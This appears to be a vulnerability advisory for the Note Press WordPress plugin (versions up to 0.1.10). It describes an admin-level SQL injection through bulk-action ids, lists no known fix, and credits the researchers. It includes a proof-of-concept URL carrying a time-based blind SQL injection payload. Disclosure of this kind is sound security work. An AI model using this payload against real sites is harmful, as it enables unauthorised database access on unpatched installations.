WordPress Plugin Vulnerabilities

Note Press <= 0.1.10 - Admin+ SQLi via Bulk Actions

Description

The plugin does not sanitise and escape the ids from the bulk actions before using them in a SQL statement in an admin page, leading to an SQL injection

Proof of Concept

https;//example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&_wpnonce=e4ee1ce89d&action=delete&paged=1&id%5B%5D=18+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)&id%5B%5D=19&action2=delete

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Submitter
Daniel Krohmer
Verified
Yes

Timeline

Publicly Published
2022-05-09 (about 1 years ago)
Added
2022-05-12 (about 1 years ago)
Last Updated
2022-05-14 (about 1 years ago)

Other